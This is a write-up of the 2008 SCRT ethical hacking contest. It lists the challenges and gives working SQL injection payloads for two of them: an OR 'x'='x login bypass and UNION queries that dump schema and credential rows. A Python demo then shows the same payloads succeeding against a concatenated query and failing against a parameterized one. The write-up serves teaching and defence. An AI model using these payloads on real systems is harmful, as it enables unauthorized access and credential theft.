On 8th February 2008, SCRT organized the first ethical hacking contest in Western Switzerland.
The contest is now over.

The challenges

We present here some solutions to the challenges.
| No | Challenge name | Points | Access |
| - | - | - | - |
| 1 | Methadone | 200 | hackthis.insomni.hack/methadone |
| 6 | Highlander | 600 | begin.insomni.hack |
| 8 | Oxymore | 200 | hackthis.insomni.hack/oxymore |
| 9 | NoNo | 100 | hackthis.insomni.hack/NoNo |
| 5 | Ventriloque | 600 | www.insomni.hack/ventriloque |
| 3 | Cherche&Trouve | 1000 | www.insomni.hack/cherche&trouve |
| 2 | Héroïne | 800 | hackthis.insomni.hack/heroine |
| 7 | Cascade Scoubidou | 200 | www.insomni.hack/cascade |
| 7 | Cascade orthodoxe | 400 | www.insomni.hack/cascade |
| 7 | Cascade de chiffres | 600 | www.insomni.hack/cascade |
| 7 | Cascade old-school | 800 | www.insomni.hack/cascade |
| 10 | OUAIP | 500 | |

Challenge 1: Methadone
A simple SQL injection, OR 'x'='x, made it possible to bypass the login/password protection.

Challenge 2: Héroïne
Harder SQL injection.
Here are the steps to pass this challenge.

Find the right table:

    ' OR 'x'='x' union select table_name,table_type,table_schema from information_schema.tables where 'x'='x

Or find the right column directly:

    ' ' OR 'x'='x' union select table_name,column_name,table_schema from information_schema.columns where 'x'='x

The resulting query:

    SELECT * FROM hackthis_BDD.membres WHERE identifiant = 'toto' AND motpasse = ' ' OR 'x'='x' union select table_name,table_schema,column_name from information_schema.columns where 'x'='x'

Get the login/password:

    ' OR 'x'='x' union select * from membres where 'x'='x
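
Both challenges work because the login query is built by pasting the submitted password into the SQL text. The following is an added example, not code from the contest or from SCRT: it reproduces that query shape next to a parameterized version and runs the two payloads quoted above against each. The in-memory SQLite database, the three-column layout of `membres`, the sample rows and the function names are assumptions made for illustration.

```python
import sqlite3

# Payloads exactly as quoted in the write-up above.
PAYLOAD_BYPASS = "' OR 'x'='x"
PAYLOAD_UNION = "' OR 'x'='x' union select * from membres where 'x'='x"

def make_db():
    """Constructed stand-in for the challenge's `membres` table (layout assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE membres (id INTEGER, identifiant TEXT, motpasse TEXT)")
    db.executemany("INSERT INTO membres VALUES (?, ?, ?)",
                   [(1, "admin", "constructed-pw-1"), (2, "alice", "constructed-pw-2")])
    return db

def login_vulnerable(db, user, password):
    # 'Before' form: input is concatenated into the SQL text, so a quote in the
    # password ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT * FROM membres WHERE identifiant = '" + user +
           "' AND motpasse = '" + password + "'")
    return db.execute(sql).fetchall()

def login_parameterized(db, user, password):
    # Hardened form: placeholders bind the input as values; quotes stay data.
    # (Plaintext comparison mirrors the challenge query; hashing is a separate control.)
    sql = "SELECT * FROM membres WHERE identifiant = ? AND motpasse = ?"
    return db.execute(sql, (user, password)).fetchall()

def compare(user, password):
    """Return (row count from vulnerable login, row count from parameterized login)."""
    db = make_db()
    return (len(login_vulnerable(db, user, password)),
            len(login_parameterized(db, user, password)))

if __name__ == "__main__":
    for label, pw in [("wrong password", "nope"),
                      ("bypass payload", PAYLOAD_BYPASS),
                      ("union payload", PAYLOAD_UNION),
                      ("valid password", "constructed-pw-1")]:
        print(label, compare("admin", pw))
```

With the concatenated query, `AND` binds tighter than `OR`, so the trailing `'x'='x'` makes the WHERE clause true for every row; with bound parameters the same strings are compared as literal passwords and match nothing.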